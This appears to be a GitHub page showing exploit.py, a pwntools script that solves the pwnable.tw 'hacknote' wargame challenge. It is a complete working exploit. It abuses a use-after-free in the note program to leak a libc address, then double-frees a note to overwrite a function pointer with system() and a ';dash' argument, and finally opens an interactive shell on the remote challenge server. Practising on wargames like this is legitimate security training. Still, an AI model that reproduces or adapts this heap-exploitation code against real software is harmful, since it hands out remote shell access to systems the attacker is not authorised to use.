-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
64 lines (54 loc) · 1.23 KB
/
Copy pathexploit.py
File metadata and controls
64 lines (54 loc) · 1.23 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python
# pwnable.tw hacknote
from pwn import *
debug = 0
def menu(choice):
s.recvuntil('choice :')
s.send(str(choice))
def add(size, content): # size : int, content : str
menu(1)
s.recvuntil('Note size :')
s.send(str(size))
s.recvuntil('Content :')
s.send(content)
if debug:
print('add finished')
def delete(index):
menu(2)
s.recvuntil('Index :')
s.send(str(index))
if debug:
print('delete finished')
def printNote(index):
menu(3)
s.recvuntil('Index :')
s.send(str(index))
if debug:
print('printNote finished')
def exploit():
# libc leak
add(0x60, 'A') # 0
add(0x08, 'b') # 1
delete(0)
add(0x60, 'z'*4) # 2
printNote(0)
s.recvuntil('z' * 4)
re = u32(s.recv(4))
libc_base = re - 0x1b07b0
if debug:
log.info('libc_base : '+hex(libc_base))
system = libc_base + 0x3a940
delete(1)
delete(1)
add(0x40, 'x') # 3
add(9, p32(system)+';dash') # 4
printNote(3)
if __name__ == '__main__':
if debug:
s = process('./hacknote')
pause()
else:
s = remote('chall.pwnable.tw', 10102)
exploit()
s.interactive()
s.close()